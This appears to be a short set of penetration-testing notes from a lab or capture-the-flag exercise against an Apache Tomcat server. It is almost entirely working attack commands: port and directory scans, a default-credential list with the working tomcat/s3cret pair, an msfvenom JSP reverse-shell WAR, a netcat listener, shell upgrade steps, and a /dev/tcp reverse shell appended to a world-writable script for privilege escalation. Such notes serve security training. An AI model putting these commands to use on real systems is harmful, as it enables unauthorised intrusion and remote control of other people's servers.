nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
password
Password1
password1
admin
tomcat
tomcat
manager
role1
tomcat
changethis
Password1
changethis
password
password1
r00t
root
toor
tomcat
s3cret
password1
password
admin
changethis
Username: tomcat
Password: s3cret
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$KALI LPORT=1337 -f war > rshell.war
nc -lvnp 1337
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
The script is writable by everyone so I added a the below line to reach back to my kali.
echo 'sh -i >& /dev/tcp/10.10.165.185/1338 0>&1' >> id.sh